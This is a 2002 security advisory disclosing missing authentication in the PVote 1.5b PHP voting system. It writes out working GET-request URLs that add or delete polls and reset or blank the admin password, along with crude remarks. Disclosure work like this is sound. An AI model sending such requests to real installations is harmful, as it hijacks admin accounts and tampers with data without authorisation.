Telhack Security Advisory - #1
Name: PVote 1.5b Impact: Minor (Content manipulation, Script admin) Date: April 18 / 2002
Daniel Nyström <firstname.lastname@example.org>
I N F O PVote is a PHP voting system. It uses MySQL to hold all information about the system. Author has been notified of all three problems described in this advisory.
P R O B L E M A lot of the scripts in the PVote package do not properly check who the userare and therefore lets anyone add or delete polls at any time. Also, there exist a vulnerability that lets anyone change the Admin password or set it to null.
I M P A C T Minor, as content manipulation aint to bad after all. Just a little bit embarrasing.
E X P L O I T I N G These 'Add/Del' and 'Admin change pass' vulns. can all be exploited from a web browser by a basic GET requests that might look something like these:
ADD http://isp.net/pvote/add.php?question=AmIgAy&o1=yes&o2=yeah&o3=well..yeah&o4 =bad Question is the question:) o1-o4 are the options.
DEL http://isp.net/pvote/del.php?pollorder=1 Pollorder is the poll 'id' number. It can be found by stepping thru poll.php to find the id as shown below: http://isp.net/pvote/poll.php?pollorder=1 and then increase pollorder (pollorder=2) and so on until you find what you want.
CHANGE ADMIN PASS http://isp.net/pvote/ch_info.php?newpass=owned&confirm=owned Again we are allowed to change stuff without having to authenticate in anyway. If we just wanna fuck with the admin we may just enter this: http://isp.net/pvote/ch_info.php As it sets both newpass and confirm to "" it sets the pass to "". This thing could have been avoided by just adding a line of code that required you to submit the old pass to be able to change.
F I X E S Many of the scripts in this package needs some kind of secure authenticationmethod that stops users from behaving badly >:) and I think it is up to the author(s?) to fix that. But until then, I would recommend removing the package.
/Daniel Nyström a.k.a excE @ Telhack 026 Inc.
http://excelsi0r.darktech.org/~exce/ http://www.telhack.com <- page temporarily down.